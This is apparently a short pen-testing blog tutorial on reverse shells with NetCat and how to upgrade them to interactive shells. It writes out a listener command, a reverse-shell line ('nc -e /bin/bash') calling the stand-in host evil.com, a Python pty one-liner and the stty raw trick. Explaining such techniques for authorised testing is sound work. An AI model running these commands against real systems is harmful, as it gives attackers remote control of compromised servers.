The holy grail of a pen test is a functioning shell. When during a pen test it has been possible to take over the server by executing commands on the system, the hacker often sets up a connection to his server. NetCat is often used for this. NetCat is a tool on Linux systems that makes it possible to control other programs via the internet. However, one of the biggest frustrations for hackers is that the shell you get back is quite limited.
Hacking with NetCat
Suppose a hacker managed to upload a file called shell.php:
The hacker opens a port on his own server (evil.com) that listens on port 4444. He does this with
nc -lvp 4444. Now run the command
nc -e / bin / bash evil.com 4444 on the hacked server. The hacked server will now establish a connection to the hacker’s server. We call this a reverse tcp shell.
john@Technetium:~$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [188.8.131.52] port 4444 [tcp/*] accepted (family 2, sport 54490)
Above is what a hacker will see. If the attacker accidentally enters CTRL-C, he will lose his shell. Also commands that require interaction (such as su) do not work.
Upgrade NC Shell to an interactive shell
The first step we can do to improve this is to start an interactive shell with Python. This can be done with the Python PTY module, and works as follows:
python -c 'import pty; pty.spawn("/bin/bash")'
The above command produces a semi-interactive shell. That is, it is possible to use commands such as
mysql, which ask for a password. The shell still closes itself with CTRL-C, and auto completion via TAB doesn’t work either. With a few simple commands (and a little magic) we can now go to a full shell.
When we execute
CTRL-Z the shell is moved to the background. Then we type (in our local terminal):
stty raw -echo
The above ensures that we now have a full shell, and can do everything that could be done via SSH, for example. Functions such as tab completion and history are now working. And VIM via NetCat? Sure!